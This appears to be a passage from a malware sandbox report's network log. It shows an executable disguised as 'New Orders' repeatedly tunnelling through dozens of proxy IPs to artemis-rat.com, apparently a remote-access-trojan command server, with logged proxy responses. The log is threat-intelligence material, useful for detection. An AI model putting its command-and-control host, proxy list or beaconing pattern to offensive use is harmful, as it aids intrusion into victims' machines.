                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1143192.168.2.953286211.222.252.187807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.209553003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1144192.168.2.95302442.61.48.21980007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.212708950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.487488985 CET74INHTTP/1.1 200 OK
                                                                                        date: Mon, 11 Mar 2024 14:56:31 GMT
                                                                                        server: svcproxy


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1145192.168.2.95328345.138.87.23810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.220729113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1146192.168.2.95329972.206.181.105649357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.224040985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1147192.168.2.95339672.167.222.113125817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.230166912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.773324013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.273689032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1148192.168.2.95329347.76.163.11531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.231323004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.546890020 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1149192.168.2.953355205.233.79.2309997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.231610060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.523385048 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1150192.168.2.953296213.252.245.22161167672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.249881029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.812638044 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1151192.168.2.953291148.72.209.174162037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.251270056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961271048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1152192.168.2.95352043.157.17.1464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.252078056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1153192.168.2.95352243.157.17.1464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.254338980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1154192.168.2.95352643.157.17.1464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.255736113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1155192.168.2.95352743.157.17.1464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.256895065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1156192.168.2.951290185.212.60.62807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.263283014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.636826992 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1157192.168.2.953382107.180.90.42106707672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.268882036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.835844040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.539407015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930818081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.648369074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445444107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.132893085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.509195089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.038847923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1158192.168.2.95332947.242.15.120156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.270196915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1159192.168.2.952631130.255.162.199203987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.288145065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476257086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.576383114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.664211035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.679331064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.773143053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.773153067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.778558016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:44.976336956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1160192.168.2.953003198.8.84.341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.288149118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1161192.168.2.95339067.43.236.1877977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.288296938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.229397058 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1162192.168.2.95344323.227.38.230807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.288769007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.445501089 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1163192.168.2.953302185.101.16.52807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.288855076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1164192.168.2.953446172.67.181.136807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.289161921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.446012020 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1165192.168.2.95344945.12.31.104807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.289854050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.446634054 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
